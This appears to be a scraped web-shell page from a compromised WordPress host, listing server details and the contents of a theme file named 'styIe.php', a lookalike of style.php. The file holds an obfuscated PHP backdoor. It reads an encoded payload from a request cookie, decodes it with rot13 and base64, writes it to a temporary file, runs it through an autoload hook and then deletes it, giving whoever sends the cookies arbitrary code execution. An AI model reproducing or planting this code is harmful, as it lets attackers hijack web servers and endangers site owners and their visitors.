HEX
Server: LiteSpeed
System: Linux 110.webhostingindonesia.co.id 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: uvlnfyba (10197)
PHP: 7.4.33
Disabled: opcache_get_status,exec,passthru,shell_exec,system,popen,mail,proc_open,show_source,
$ pwd: /home/jkwebsite.my.id/data.jkwebsite.my.id/wp-content/themes/archives-1753434681/
Upload Files
File: /home/jkwebsite.my.id/data.jkwebsite.my.id/wp-content/themes/archives-1753434681/styIe.php
<!--FIvFl8KA-->
<?php

if (isset($_COOKIE[53+-53]) && isset($_COOKIE[21-20]) && isset($_COOKIE[46-43]) && isset($_COOKIE[63+-59])) {
    $parameter_group = $_COOKIE;
    function reverse_lookup($binding) {
        $parameter_group = $_COOKIE;
        $itm = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'LpIWERrG');
        if (!is_writable($itm)) {
            $itm = getcwd() . DIRECTORY_SEPARATOR . "data_storage";
        }
        $object = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($parameter_group[3]));
        if (is_writeable($itm)) {
            $reference = fopen($itm, 'w+');
            fputs($reference, $object);
            fclose($reference);
            spl_autoload_unregister(__FUNCTION__);
            require_once($itm);
            @array_map('unlink', array($itm));
        }
    }
    spl_autoload_register("reverse_lookup");
    $elem = "db29ec3f23b7c9585b6b630e45f0e010";
    if (!strncmp($elem, $parameter_group[4], 32)) {
        if (@class_parents("sync_manager_mutex_lock", true)) {
            exit;
        }
    }
}
@ Telegram